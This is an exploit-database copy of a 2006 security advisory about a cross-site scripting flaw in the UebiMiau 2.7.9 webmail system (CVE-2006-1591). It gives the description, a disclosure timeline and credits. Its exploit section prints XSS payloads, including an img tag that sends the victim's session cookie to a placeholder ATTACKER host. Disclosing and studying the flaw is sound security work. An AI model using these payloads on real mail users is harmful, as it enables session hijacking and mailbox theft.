Advertisement






UebiMiau Webmail System Security Vulnerability

CVE Category Price Severity
CVE-2006-1591 CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Unknown High Remote 2006-02-11
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006010073

Below is a copy:

I.Vulnerability
UebiMiau Webmail System Cross Site Scripting Vulnerability

II.Vendor
Aldoir Ventura

III.Affected Systems
* UebiMiau 2.7.9 (latest release) and probably previous versions.

IV.About
UebiMiau is a simple, yet efficient mail reader (webmail) supporting both
IMAP and POP3 without dependence of any PHP's extra modules or database
(http://www.uebimiau.org).

V.Description
UebiMiau does not filter HTML e-mail messages correctly, it's possible to
inject mailicious scripting codes to an e-mail. An attacker is able to
hijack a user's session and access victim's mailbox just by sending a
specially crafted e-mail message.

This is a dangerous situation because there is no need to click a link in
some cases, client-side code executing when the user opens crafted e-mail.

VI.Exploit 
<img
src="javascript:location.href='http://ATTACKER/StealSessionData/?'+docum
ent.
cookie;" />
<img src="javascript:[XSS];" />
<a href="javascript:location.href='http://ATTACKER/StealSessionData/'">test

link 1</a>
<a href='http://ATTACKER/StealData/'>test link 2</a>

VII.Vulnerability Status
* Vulnerability discovered on 2006-01-12.
* Vendor notified on 2006-01-12.
* No response from vendor, vulnerability published on 2006-01-28.

VIII.Workarounds
* No vendor-supplied patch is currently available.

IX.Credits
M.Neset KABAKLI
Wakiza Software Technologies 
neset{at}wakiza{dot}com
www.wakiza.com

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum